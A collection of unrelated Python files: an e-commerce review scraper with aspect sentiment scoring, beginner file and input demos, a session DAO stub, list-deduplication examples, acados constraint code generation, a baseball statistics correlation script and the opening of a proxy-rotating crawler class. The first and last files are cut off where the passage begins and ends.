        #reviews scrapping: follow the per-aspect "product-reviews" links.
        driver.execute_script('window.scroll(0,3500)')
        link=[]
        comment=[]
        for t in soup1.findAll('a',attrs=({'class':'col-3-12 hXkZu- _1pxF-h','href':re.compile("/product-reviews/")})) :
            q = t.get('href')
            link.append(q)
        print(link)
        # Link order (camera/battery/display/value) is assumed from the page
        # layout — TODO confirm it is stable.
        camera_link=link[0]
        battery_link=link[1]
        display_link=link[2]
        vfm_link=link[3]
        camera_reviews=[]
        battery_reviews=[]
        display_reviews=[]
        vfm_reviews=[]
        performance_reviews=[]
        url1_camera_reviews=flipkart_scapper(camera_link,driver)
        url1_battery_reviews=flipkart_scapper(battery_link,driver)
        url1_display_reviews=flipkart_scapper(display_link,driver)
        url1_vfm_reviews=flipkart_scapper(vfm_link,driver)
        qq=driver.current_url
        r2=rq.get(qq)
        soup=BeautifulSoup(r2.text,'html.parser')
        # The "performance" reviews link has no class of its own; take the
        # last anchor found in this container.
        per_review=soup.find('div',{'class':'_33iqLu'})
        for x in per_review.find_all('a',{'class':''}):
            x = x.get('href')
            performance_link=x
        url1_performance_reviews=flipkart_scapper(performance_link,driver)
    else :
        # Amazon branch for url1.
        header= {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
        driver=webdriver.Chrome(executable_path=r"C:\Users\Chetan Niradwar\Downloads\chromedriver.exe")
        driver.maximize_window()
        driver.get(url1)
        r1=rq.get(url1,headers=header)
        soup1 = BeautifulSoup(r1.text,'html.parser')
        # NOTE(review): the soup built from the plain GET above is immediately
        # discarded and replaced with the selenium-rendered page source.
        soup1 =BeautifulSoup(driver.page_source,'html.parser')
        #spects scrapping
        RAM1= soup1.find_all('div',{'class':'attribute-heading-label'})
        spects=[]
        for ele1 in RAM1:
            ram1=ele1.get_text()
            newram=ram1.replace("\n","")
            spects.append(newram)
        spects_set = []
        for i in spects:
            if i not in spects_set:
                spects_set.append(i)
        # Normalize Amazon's attribute labels to Flipkart-style keys so the
        # template can treat both sources the same.
        spects_set[0]="PrimaryCamera"
        spects_set[3]="ResolutionType"
        spects_set[4]="BatteryCapacity"
        spects_set[6]="InternalStorage"
        spects_set[8]="ProcessorType"
        spects_set[10]="WarrantySummary"
        spects_set[15]="OtherFeatures"
        key_spects=[]
        RAM2= soup1.find_all('td',{'class':'base-item-column'})
        for ele1 in RAM2:
            ram1=ele1.get_text()
            newram=ram1.replace("\n","")
            key_spects.append(newram)
        key_spects_set = []
        for i in key_spects:
            if i not in key_spects_set:
                key_spects_set.append(i)
        #IMAGE sCRAPPING
        src=soup1.find('div',{'id':'dpx-btf-hlcx-comparison_feature_div'})
        src=src.find('div',{'class':'a-row a-spacing-top-medium'})
        srcV1=src.find('img',{'class':'a-lazy-loaded'})
        srcV2=srcV1.get('data-src')
        spects_set.append('url1_image')
        key_spects_set.append(srcV2)
        url1_spects_img_dict=dict(zip(spects_set,key_spects_set))
        #reviews Scrapping
        driver.execute_script('window.scroll(0,3500)')
        for t in soup1.findAll('a',attrs={'data-hook':"see-all-reviews-link-foot"}):
            link.append(t['href'])
        f_url=link.pop()
        l_url=('https://www.amazon.in'+str(f_url))
        i=1
        while i<=2:
            ss=driver.get(str(l_url)+'&pageNumber='+str(i))
            qq=driver.current_url
            r2=rq.get(qq)
            soup=BeautifulSoup(r2.text,'html.parser')
            for co in soup.find_all('span',{'class':'a-size-base review-text review-text-content'}) :
                cc=co.get_text()
                comment.append(cc)
            i=i+1
        amz_all_reviews=comment
        # Keyword buckets used to route each review to an aspect.
        cam=['camera','image','picture','photo','video','photography']
        bat=['battery','backup','drain','charging','mah']
        disp=['display','screen','density','resolution','ips','amoled']
        value_for_money =['value','price','money','cost','expensive']
        perfor=['processor','performance','game','graphic','COD']
        url1_camera_reviews=[]
        url1_battery_reviews=[]
        url1_display_reviews=[]
        url1_vfm_reviews=[]
        url1_performance_reviews=[]
        short_amz_reviews=[]
        # Halve very long reviews so the ABSA model gets manageable inputs.
        for text in amz_all_reviews:
            text=text.lower()
            text=text.replace('\n', '')
            if(len(text)>1500):
                res_first, res_second = text[:len(text)//2], text[len(text)//2:]
                short_amz_reviews.append(res_first)
                short_amz_reviews.append(res_second)
            else:
                short_amz_reviews.append(text)
        print(short_amz_reviews)
        for short_text in short_amz_reviews:
            if any(word in short_text for word in cam):
                url1_camera_reviews.append(short_text)
            # NOTE(review): the 'bat' keywords feed the *display* bucket and
            # the 'disp' keywords feed the *battery* bucket — looks swapped;
            # confirm before relying on these aspect counts.
            if any(word in short_text for word in bat):
                url1_display_reviews.append(short_text)
            if any(word in short_text for word in disp):
                url1_battery_reviews.append(short_text)
            if any(word in short_text for word in value_for_money):
                url1_vfm_reviews.append(short_text)
            if any(word in short_text for word in perfor):
                url1_performance_reviews.append(short_text)
        print(url1_camera_reviews)
    # sentiment Classification
    # NOTE(review): if any of these lists is empty, its *_list variable is
    # never bound and the modal_list.append(...) lines below raise NameError.
    if(len(url1_camera_reviews)):
        url1_camera_list=sentiment_classify(url1_camera_reviews,'Camera',nlp)
    if(len(url1_battery_reviews)):
        url1_battery_list=sentiment_classify(url1_battery_reviews,'Battery',nlp)
    if(len(url1_display_reviews)):
        url1_display_list=sentiment_classify(url1_display_reviews,'Display',nlp)
    if(len(url1_vfm_reviews)):
        url1_vfm_list=sentiment_classify(url1_vfm_reviews,'Money',nlp)
    if(len(url1_performance_reviews)):
        url1_performance_list=sentiment_classify(url1_performance_reviews,'Performance',nlp)
    # Cache url1's [positive, negative] review lists at indices 0-9.
    modal_list.append(url1_camera_list[0])
    modal_list.append(url1_camera_list[1])
    modal_list.append(url1_battery_list[0])
    modal_list.append(url1_battery_list[1])
    modal_list.append(url1_display_list[0])
    modal_list.append(url1_display_list[1])
    modal_list.append(url1_vfm_list[0])
    modal_list.append(url1_vfm_list[1])
    modal_list.append(url1_performance_list[0])
    modal_list.append(url1_performance_list[1])
    url1_dict={"url1_camera_per_pos_count":url1_camera_list[2],
    "url1_camera_per_neg_count":url1_camera_list[3],
    "url1_camera_pos_count":url1_camera_list[4],
    "url1_camera_neg_count":url1_camera_list[5],
    "url1_battery_per_pos_count":url1_battery_list[2],
    "url1_battery_per_neg_count":url1_battery_list[3],
    "url1_battery_pos_count":url1_battery_list[4],
    "url1_battery_neg_count":url1_battery_list[5],
    "url1_display_per_pos_count":url1_display_list[2],
    "url1_display_per_neg_count":url1_display_list[3],
    "url1_display_pos_count":url1_display_list[4],
    "url1_display_neg_count":url1_display_list[5],
    "url1_vfm_per_pos_count":url1_vfm_list[2],
    "url1_vfm_per_neg_count":url1_vfm_list[3],
    "url1_vfm_pos_count":url1_vfm_list[4],
    "url1_vfm_neg_count":url1_vfm_list[5],
    "url1_performance_per_pos_count":url1_performance_list[2],
    "url1_performance_per_neg_count":url1_performance_list[3],
    "url1_performance_pos_count":url1_performance_list[4],
    "url1_performance_neg_count":url1_performance_list[5]
    }
    # ---- Same pipeline again for the second product URL. ----
    if "flipkart.com" in url2 :
        driver=webdriver.Chrome(executable_path=r"C:\Users\Chetan Niradwar\Downloads\chromedriver.exe")
        driver.maximize_window()
        driver.get(url2)
        r1=rq.get(url2)
        soup1 =BeautifulSoup(r1.text,'html.parser')
        imgscrp1=BeautifulSoup(driver.page_source,'html.parser')
        RAM1= soup1.find_all('li',{'class':'_21lJbe'})
        for ele1 in RAM1:
            ram1=ele1.get_text()
            spects1.append(ram1)
        Keys1=soup1.find_all('td',{'class':'_1hKmbr col col-3-12'})
        for key1 in Keys1:
            k=key1.get_text()
            k=k.replace(" ","")
            # Suffix "1" distinguishes url2's spec keys from url1's in the
            # merged template context.
            k=k+"1"
            key_spects1.append(k)
        #image scrapping
        src=imgscrp1.find('div',{'class':'_1BweB8'})
        srcV1=src.find('img',{'class':'_396cs4 _2amPTt _3qGmMb _3exPp9'})
        url2_image1=srcV1.get('src')
        key_spects1.append('url2_image1')
        spects1.append(url2_image1)
        url2_spects_img_dict=dict(zip(key_spects1,spects1))
        #reviews scrapping
        driver.execute_script('window.scroll(0,3500)')
        link=[]
        comment=[]
        for t in soup1.findAll('a',attrs=({'class':'col-3-12 hXkZu- _1pxF-h','href':re.compile("/product-reviews/")})) :
            q = t.get('href')
            link.append(q)
        camera_link=link[0]
        battery_link=link[1]
        display_link=link[2]
        vfm_link=link[3]
        camera_reviews=[]
        battery_reviews=[]
        display_reviews=[]
        vfm_reviews=[]
        performance_reviews=[]
        url2_camera_reviews=flipkart_scapper(camera_link,driver)
        url2_battery_reviews=flipkart_scapper(battery_link,driver)
        url2_display_reviews=flipkart_scapper(display_link,driver)
        url2_vfm_reviews=flipkart_scapper(vfm_link,driver)
        qq=driver.current_url
        r2=rq.get(qq)
        soup=BeautifulSoup(r2.text,'html.parser')
        per_review=soup.find('div',{'class':'_33iqLu'})
        for x in per_review.find_all('a',{'class':''}):
            x = x.get('href')
            performance_link=x
        url2_performance_reviews=flipkart_scapper(performance_link,driver)
    else :
        # Amazon branch for url2.
        header= {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
        driver=webdriver.Chrome(executable_path=r"C:\Users\Chetan Niradwar\Downloads\chromedriver.exe")
        driver.maximize_window()
        driver.get(url2)
        r1=rq.get(url2,headers=header)
        soup1 =BeautifulSoup(r1.text,'html.parser')
        imgscrp1=BeautifulSoup(driver.page_source,'html.parser')
        #spects scrapping
        RAM1= soup1.find_all('div',{'class':'attribute-heading-label'})
        spects1=[]
        for ele1 in RAM1:
            ram1=ele1.get_text()
            # NOTE: unlike the url1 branch, newlines become spaces here.
            newram=ram1.replace("\n"," ")
            newram=newram+"1"
            spects1.append(newram)
        spects_set1 = []
        for i in spects1:
            if i not in spects_set1:
                spects_set1.append(i)
        spects_set1[0]="PrimaryCamera1"
        spects_set1[3]="ResolutionType1"
        spects_set1[4]="BatteryCapacity1"
        spects_set1[6]="InternalStorage1"
        spects_set1[8]="ProcessorType1"
        spects_set1[10]="WarrantySummary1"
        spects_set1[15]="OtherFeatures1"
        key_spects1=[]
        RAM2= soup1.find_all('td',{'class':'base-item-column'})
        for ele1 in RAM2:
            ram1=ele1.get_text()
            newram=ram1.replace("\n"," ")
            key_spects1.append(newram)
        key_spects_set1 = []
        for i in key_spects1:
            if i not in key_spects_set1:
                key_spects_set1.append(i)
        #IMAGE sCRAPPING
        src=imgscrp1.find('div',{'id':'dpx-btf-hlcx-comparison_feature_div'})
        src=src.find('div',{'class':'a-row a-spacing-top-medium'})
        srcV1=src.find('img',{'class':'a-lazy-loaded'})
        srcV2=srcV1.get('data-src')
        spects_set1.append('url2_image')
        key_spects_set1.append(srcV2)
        url2_spects_img_dict=dict(zip(spects_set1,key_spects_set1))
        #reviews Scrapping
        driver.execute_script('window.scroll(0,3500)')
        for t in soup1.findAll('a',attrs={'data-hook':"see-all-reviews-link-foot"}):
            link1.append(t['href'])
        f_url=link1.pop()
        l_url=('https://www.amazon.in'+str(f_url))
        i=1
        while i<=3:
            ss=driver.get(str(l_url)+'&pageNumber='+str(i))
            qq=driver.current_url
            r2=rq.get(qq)
            soup=BeautifulSoup(r2.text,'html.parser')
            for co in soup.find_all('span',{'class':'a-size-base review-text review-text-content'}) :
                cc=co.get_text()
                comment1.append(cc)
            i=i+1
        amz_all_reviews=comment1
        cam=['camera','image','picture','photo','video','photography']
        bat=['battery','backup','drain','charging','mah']
        disp=['display','screen','density','resolution','ips','amoled']
        value_for_money =['value','price','money','cost','expensive']
        perfor=['processor','performance','game','graphic','COD']
        url2_camera_reviews=[]
        url2_battery_reviews=[]
        url2_display_reviews=[]
        url2_vfm_reviews=[]
        url2_performance_reviews=[]
        short_amz_reviews=[]
        for text in amz_all_reviews:
            text=text.lower()
            text=text.replace('\n', '')
            if(len(text)>1500):
                res_first, res_second = text[:len(text)//2], text[len(text)//2:]
                short_amz_reviews.append(res_first)
                short_amz_reviews.append(res_second)
            else:
                short_amz_reviews.append(text)
        for short_text in short_amz_reviews:
            if any(word in short_text for word in cam):
                url2_camera_reviews.append(short_text)
            # NOTE(review): same bat/disp bucket swap as in the url1 branch.
            if any(word in short_text for word in bat):
                url2_display_reviews.append(short_text)
            if any(word in short_text for word in disp):
                url2_battery_reviews.append(short_text)
            if any(word in short_text for word in value_for_money):
                url2_vfm_reviews.append(short_text)
            if any(word in short_text for word in perfor):
                url2_performance_reviews.append(short_text)
    if(len(url2_camera_reviews)):
        url2_camera_list=sentiment_classify(url2_camera_reviews,'Camera',nlp)
    if(len(url2_battery_reviews)):
        url2_battery_list=sentiment_classify(url2_battery_reviews,'Battery',nlp)
    if(len(url2_display_reviews)):
        url2_display_list=sentiment_classify(url2_display_reviews,'Display',nlp)
    if(len(url2_vfm_reviews)):
        url2_vfm_list=sentiment_classify(url2_vfm_reviews,'Money',nlp)
    if(len(url2_performance_reviews)):
        url2_performance_list=sentiment_classify(url2_performance_reviews,'Performance',nlp)
    # Cache url2's [positive, negative] review lists at indices 10-19.
    modal_list.append(url2_camera_list[0])
    modal_list.append(url2_camera_list[1])
    modal_list.append(url2_battery_list[0])
    modal_list.append(url2_battery_list[1])
    modal_list.append(url2_display_list[0])
    modal_list.append(url2_display_list[1])
    modal_list.append(url2_vfm_list[0])
    modal_list.append(url2_vfm_list[1])
    modal_list.append(url2_performance_list[0])
    modal_list.append(url2_performance_list[1])
    url2_dict={"url2_camera_per_pos_count":url2_camera_list[2],
    "url2_camera_per_neg_count":url2_camera_list[3],
    "url2_camera_pos_count":url2_camera_list[4],
    "url2_camera_neg_count":url2_camera_list[5],
    "url2_battery_per_pos_count":url2_battery_list[2],
    "url2_battery_per_neg_count":url2_battery_list[3],
    "url2_battery_pos_count":url2_battery_list[4],
    "url2_battery_neg_count":url2_battery_list[5],
    "url2_display_per_pos_count":url2_display_list[2],
    "url2_display_per_neg_count":url2_display_list[3],
    "url2_display_pos_count":url2_display_list[4],
    "url2_display_neg_count":url2_display_list[5],
    "url2_vfm_per_pos_count":url2_vfm_list[2],
    "url2_vfm_per_neg_count":url2_vfm_list[3],
    "url2_vfm_pos_count":url2_vfm_list[4],
    "url2_vfm_neg_count":url2_vfm_list[5],
    "url2_performance_per_pos_count":url2_performance_list[2],
    "url2_performance_per_neg_count":url2_performance_list[3],
    "url2_performance_pos_count":url2_performance_list[4],
    "url2_performance_neg_count":url2_performance_list[5]
    }
    # Merge both products' spec/image dicts and sentiment summaries into the
    # single context dict consumed by compare.html.
    url1_spects_img_dict.update(url2_spects_img_dict)
    url1_dict.update(url1_spects_img_dict)
    url1_dict.update(url2_dict)
    return url1_dict
def absa_analysis():
    """Build and return the aspect-based sentiment pipeline, wired with a
    basic pattern recognizer so results carry explanatory patterns."""
    recognizer = absa.aux_models.BasicPatternRecognizer()
    return absa.load('absa/classifier-lapt-0.2', pattern_recognizer=recognizer)
def sentiment_classify(review_list,aspect,nlp):
    """Split *review_list* into positive/negative buckets for *aspect*.

    Returns [positive_reviews, negative_reviews, pos_bar_style,
    neg_bar_style, positive_count, negative_count]; the *_style entries are
    inline-CSS width strings for the template's percentage bars.
    Callers guarantee review_list is non-empty, so the division below is safe.
    """
    positive_count=0
    negative_count=0
    pos_review=[]
    neg_review=[]
    dis_per_pos_count=""
    dis_per_neg_count=""
    total_reviews=len(review_list)
    for each_review in review_list:
        # 'Design' is a throwaway second aspect; only *aspect*'s result is used.
        completed_task = nlp(each_review, aspects=['Design',aspect])
        design,target= completed_task.examples
        sent=target.sentiment
        sentV2=str(sent)
        # str(sentiment) presumably renders as 'Sentiment.positive' — the
        # slice drops the 10-char 'Sentiment.' prefix; TODO confirm with absa.
        sentV3=sentV2[10:]
        if (sentV3=="positive"):
            positive_count=positive_count + 1
            pos_review.append(each_review)
        else:
            # Anything not "positive" (negative or neutral) counts as negative.
            negative_count=negative_count + 1
            neg_review.append(each_review)
    per_pos_count=(positive_count/total_reviews)*100
    per_neg_count=100-per_pos_count
    #to Display in html format
    dis_per_pos_count= 'style="width:'+str(per_pos_count)+'%;"'
    dis_per_neg_count= 'style="width:'+str(per_neg_count)+'%;"'
    return [pos_review,neg_review,dis_per_pos_count,dis_per_neg_count,positive_count,negative_count]
def flipkart_scapper(apsect_link, driver):
    """Collect review texts from the first three pages of a Flipkart
    product-reviews URL, stripping '...' and the 'READ MORE' suffix."""
    review_list = []
    base_url = 'https://www.flipkart.com' + str(apsect_link)
    for page in range(1, 4):
        driver.get(base_url + '&page=' + str(page))
        response = rq.get(driver.current_url)
        soup = BeautifulSoup(response.text, 'html.parser')
        for review_div in soup.find_all('div', {'class': 't-ZTKy'}):
            text = review_div.get_text().replace('...', '').replace('READ MORE', '')
            review_list.append(text)
    return review_list
|
# Demo of the common file-reading/writing idioms, all using `with` so the
# file handle is closed automatically.

# Read the entire file into one string.
with open('test.txt', 'r') as f:
    content = f.read()
    print(content)
# Read just the first line.
with open('test.txt', 'r') as f1:
    line = f1.readline()
    print(line)
# Read all lines into a list (each keeps its trailing newline).
with open('test.txt', 'r') as f2:
    lines = f2.readlines()
    print(lines)
# Successive readline() calls advance through the file.
with open('test.txt', 'r') as f3:
    line = f3.readline()
    print(line, end='')
    line = f3.readline()
    print(line, end='')
# Iterating the file object yields one line at a time (memory-friendly).
with open('test.txt', 'r') as fl:
    for line in fl:
        print(line, end='')
# read(n) returns at most n characters.
with open('test.txt', 'r') as f:
    content = f.read(50)
    print(content)
# tell() reports the position in the file after a partial read.
with open('test.txt', 'r') as f:
    size = 59
    content = f.read(size)
    print(content)
    print(f.tell())
# 'w' truncates; seek(0) then write() overwrites from the start.
with open('test2.txt', 'w') as f:
    f.write('I am new file')
    f.seek(0)
    f.write('I am overwritten')
# Line-by-line text copy.
with open('test.txt', 'r') as rf:
    with open('test_copy.txt', 'w') as wf:
        for line in rf:
            wf.write(line)
# Binary copy: 'rb'/'wb' skip text decoding entirely.
with open('tst.jpg', 'rb') as rf:
    with open('tst_copy.jpg', 'wb') as wf:
        for line in rf:
            wf.write(line)
|
# This program asks the user for some personal details:
# it greets the user by name, echoes their age and favourite movie, and
# demonstrates int()/float() conversion of input() values.
name = input("Enter your name")
print("Hello", name)
# ask user for age then say Your age is....
age = input("Enter your age")
print("You are", age)
#ask user for favourite movie
movie = input("What is your favourite movie?")
print("I really like" , movie, "too")
# int() is needed because input() always returns a string
number1 = int(input("Enter a number"))
print("If I times this number by two I get", number1 *2)
# float() accepts decimal input
number2 = float(input("Enter a decimal number"))
print("If I times this number by two I get", number2 *2)
|
#coding:utf-8
from dao.dao import Dao
class SessionDao(object):
    """Data-access stub for session records.

    Wraps a session backend object; only get() is implemented, the other
    CRUD methods are placeholders.
    """

    def __init__(self, session):
        # Backend object expected to expose get_session_id().
        self.session = session

    def get(self):
        """Return a stub session record for the wrapped session.

        Bug fix: the original read the bare name ``session`` (NameError at
        call time) instead of ``self.session``.
        """
        session_id = self.session.get_session_id()
        return {
            "session_id" : session_id,
            "user_id" : 1,
            "status" : 1,
            "last_login" : "2015-01-01 0:00:00"
        }

    def create(self, key, value):
        # Placeholder: persistence not implemented yet.
        return {}

    def update(self):
        pass

    def delete(self):
        pass
if __name__ == "__main__":
    # Demo: print a sample session record's keys and values.
    # Bug fix: the original referenced an undefined name ``session_id``
    # (NameError at runtime); use a literal sample id instead.
    dict_ = {
        "session_id" : "sample-session-id",
        "user_id" : 1,
        "status" : 1,
        "last_login" : "2015-01-01 0:00:00",
    }
    for k, v in dict_.items():
        # print() with a single argument works on both Python 2 and 3,
        # unlike the original's Python-2-only `print k` statement.
        print(k)
        print(v)
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2018/10/4 16:41
# @Author : dapeng!!
# @FileName: code_list_13.py
'''
一个列表排重,多种实践方法
'''
list1 = [7,1,2,3,4,5,5,6,7,9,8,9]

# 1) Classic loop-based dedup, preserving first-seen order.
#    (Dropped the original's `else: print("")`, which only printed a blank
#    line per duplicate and demonstrated nothing.)
list2 = []
for i in list1:
    if i not in list2:
        list2.append(i)
print(list2)

# 2) Built-in set() removes duplicates but does not preserve order.
print(list(set(list1)))

# 3) dict.fromkeys() dedups; keys keep insertion order on Python 3.7+.
lst2 = {}.fromkeys(list1).keys()
print(lst2)

# 4) List comprehension used for its side effect of filling temp.
temp = []
[temp.append(i) for i in list1 if i not in temp ]
print(temp)

# 5) set + sort(key=list1.index): dedup, then restore original order.
#    Bug fix: the original sorted the already-deduped list2, so this section
#    never actually demonstrated deduplication via sort().
list2 = list(set(list1))
list2.sort(key=list1.index)
print(list2)

# 6) sorted() with key=list1.index does the same in one expression.
#    Bug fix: the original printed list2 here instead of lst2.
lst2 = sorted(set(list1), key=list1.index)
print(lst2)
|
#
# Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren,
# Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor,
# Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan,
# Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl
#
# This file is part of acados.
#
# The 2-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.;
#
import os
from casadi import *
from .utils import ALLOWED_CASADI_VERSIONS
def generate_c_code_constraint_e( constraint, con_name ):
    """Generate C code for the terminal (end-stage) constraint functions of
    an OCP via CasADi, writing the sources into
    c_generated_code/<con_name>_constraints/.

    Emits a BGH-style h-constraint (value + transposed Jacobians) when no
    residual r is present, otherwise a BGP-style phi-constraint with
    Jacobians, Hessian blocks and residual Jacobian.

    NOTE(review): original indentation was lost on ingest and has been
    reconstructed — verify nesting against the upstream acados file.
    """
    casadi_version = CasadiMeta.version()
    casadi_opts = dict(mex=False, casadi_int='int', casadi_real='double')
    # Refuse to generate with an untested CasADi version.
    if casadi_version not in (ALLOWED_CASADI_VERSIONS):
        msg = 'Please download and install CasADi {} '.format(" or ".join(ALLOWED_CASADI_VERSIONS))
        msg += 'to ensure compatibility with acados.\n'
        msg += 'Version {} currently in use.'.format(casadi_version)
        raise Exception(msg)
    # load constraint variables and expression
    x = constraint.x
    r = constraint.r
    p = constraint.p
    nh = constraint.nh
    nphi = constraint.nphi
    # The two terminal constraint formulations are mutually exclusive.
    if nh > 0 and nphi > 0:
        raise Exception('cannot have both nh_e and phi_e > 0.')
    if nh > 0 or nphi > 0:
        # get dimensions
        nx = x.size()[0]
        if r is not None:
            nr = r.size()[0]
        else:
            nr = 0
        if x is not None:
            nx = x.size()[0]
        else:
            nx = 0
        if type(p) is list:
            # check that p is empty
            if len(p) == 0:
                np = 0
                p = SX.sym('p', 0, 0)
            else:
                raise Exception('p is a non-empty list. It should be either an empty list or an SX object.')
        else:
            np = p.size()[0]
        # create dummy u (terminal stage has no controls)
        u = SX.sym('u', 0, 0)
        # create dummy z (no algebraic variables at the terminal stage)
        z = SX.sym('z', 0, 0)
        # set up functions to be exported
        fun_name = con_name + '_constr_h_e_fun_jac_uxt_zt'
        gen_dir = con_name + '_constraints'
        # set up and change directory (restored via os.chdir('../..') below)
        if not os.path.exists('c_generated_code'):
            os.mkdir('c_generated_code')
        os.chdir('c_generated_code')
        if not os.path.exists(gen_dir):
            os.mkdir(gen_dir)
        gen_dir = con_name + '_constraints'
        gen_dir_location = './' + gen_dir
        os.chdir(gen_dir_location)
        if nr == 0: # BGH constraint
            con_h_expr = constraint.con_h_expr
            jac_x = jacobian(con_h_expr, x)
            jac_z = jacobian(con_h_expr, z)
            constraint_fun_jac_tran = Function(fun_name, [x, u, z, p], [con_h_expr, transpose(jac_x), transpose(jac_z)])
            file_name = con_name + '_constr_h_e_fun_jac_uxt_zt'
            constraint_fun_jac_tran.generate(file_name, casadi_opts)
        else: # BGP constraint
            con_phi_expr = constraint.con_phi_expr
            con_r_expr = constraint.con_r_expr
            fun_name = con_name + '_phi_e_constraint'
            # Express phi directly in x by substituting the residual r.
            con_phi_expr_x = substitute(con_phi_expr, r, con_r_expr)
            phi_jac_x = jacobian(con_phi_expr_x, x)
            phi_jac_u = jacobian(con_phi_expr_x, u)
            phi_jac_z = jacobian(con_phi_expr_x, z)
            r_jac_x = jacobian(con_r_expr, x)
            r_jac_u = jacobian(con_r_expr, u)
            # Stack per-component Hessians of phi w.r.t. r.
            # NOTE(review): the loop bound is nh, but in this BGP branch
            # nh may be 0 (nh and nphi are mutually exclusive above) —
            # nphi looks like the intended bound; confirm against upstream.
            hess = hessian(con_phi_expr[0], r)[0]
            for i in range(1, nh):
                hess = vertcat(hess, hessian(con_phi_expr[i], r)[0])
            constraint_phi = Function(fun_name, [x, u, z, p],
            [con_phi_expr_x, transpose(phi_jac_x), transpose(phi_jac_z), hess, transpose(r_jac_x)])
            file_name = con_name + '_phi_e_constraint'
            constraint_phi.generate(file_name, casadi_opts)
        # cd back to the original working directory
        os.chdir('../..')
    return
|
import pandas as pd
import numpy as np
def historicalData(path="data/mlb_historical_data.csv"):
    """Rank stat columns of *path* by R^2 correlation with the 'R/G' column.

    Column 0 is skipped, matching the original loop. Prints and returns
    ``[(column_index, r_squared), ...]`` sorted by descending R^2.
    The *path* parameter generalises the previously hard-coded file name;
    its default preserves the old behaviour, and the return value makes the
    ranking usable by callers (the original only printed it).
    """
    data_set = pd.read_csv(path)
    runs_game = list(data_set.loc[:, 'R/G'])
    corr_dict = {}
    for i in range(1, len(data_set.columns)):
        x_values = list(data_set.iloc[:, i])
        # [0, 1] entry of the 2x2 correlation matrix is corr(x, runs/game).
        correlation_xy = np.corrcoef(x_values, runs_game)[0, 1]
        corr_dict[i] = correlation_xy ** 2
    ranked = sorted(corr_dict.items(), key=lambda kv: kv[1], reverse=True)
    print(ranked)
    return ranked
def advancedData(path="data/mlb_historical_advanced.csv"):
    """Rank advanced-stat columns of *path* by R^2 against 'R/G'.

    Same procedure as the historical ranking but reading the advanced-stats
    CSV. Prints and returns ``[(column_index, r_squared), ...]`` sorted by
    descending R^2; *path* generalises the previously hard-coded file name.
    """
    data_set = pd.read_csv(path)
    runs_game = list(data_set.loc[:, 'R/G'])
    corr_dict = {}
    for i in range(1, len(data_set.columns)):
        x_values = list(data_set.iloc[:, i])
        correlation_xy = np.corrcoef(x_values, runs_game)[0, 1]
        corr_dict[i] = correlation_xy ** 2
    ranked = sorted(corr_dict.items(), key=lambda kv: kv[1], reverse=True)
    print(ranked)
    return ranked
advancedData()
|
import datetime
import os
import sys
import time
import logging
import requests
from config import PROXY_URL
class SpiderBase():
    """Base class for proxy-rotating crawlers.

    Wraps a requests session: get_proxy() pulls a fresh proxy IP from the
    PROXY_URL API (the current proxy is reused until it fails 3 times),
    and send_request() retries GET/POST through the current proxy,
    rotating on failure.
    """
    selenium = False
    name = 'base'

    def __init__(self, logger=None, account=None):
        self.l = logger if logger else logging
        self.driver = None                  # placeholder for a selenium driver
        self.account = account
        self.pid = os.getpid()
        self.s = requests.session()
        self.proxy = {}                     # current proxies dict for requests
        self.proxy_fa = 0                   # consecutive failures on the current proxy
        self.change_proxy_times = 0         # how many proxies have been fetched
        self.retry_get_proxy_times = 20
        self.retry_send_request_times = 20
        self.proxy_api = PROXY_URL
        self.proxy_request_delay = 5        # seconds slept after a failed request

    def get_proxy(self):
        """Return a requests ``proxies`` dict, fetching a new IP once the
        current one has failed 3 times.

        Raises Exception after ``retry_get_proxy_times`` consecutive
        fetch failures (the proxy API itself is down).
        """
        l = self.l
        if self.proxy and self.proxy_fa < 3:
            return self.proxy
        for _ in range(self.retry_get_proxy_times):
            try:
                l.info("start get proxy...")
                ret_ip = requests.get(self.proxy_api, timeout=10)
                IP = ret_ip.text.strip()
                proxies = {"http": "http://%s" % IP, "https": "https://%s" % IP}
                self.proxy = proxies
                self.proxy_fa = 0
                self.change_proxy_times += 1
                return proxies
            except Exception as e:
                l.warning(f"query: {self.proxy_api}, get proxy error, sleep 5s and try again.... {str(e)}")
                time.sleep(5)
        # The proxy API is down.
        raise Exception(f"failed to get proxy after {self.retry_get_proxy_times} times....")

    def send_request(self, method, **kwargs):
        """Send an HTTP request through the current proxy, with retries.

        *method* is 'get' or 'post' (case-insensitive); remaining kwargs
        are forwarded to requests. 'verify' is stripped and a 30s timeout
        is applied unless the caller supplies one. Raises Exception after
        ``retry_send_request_times`` failed attempts.
        """
        l = self.l
        func_dict = {
            'get': self.s.get,
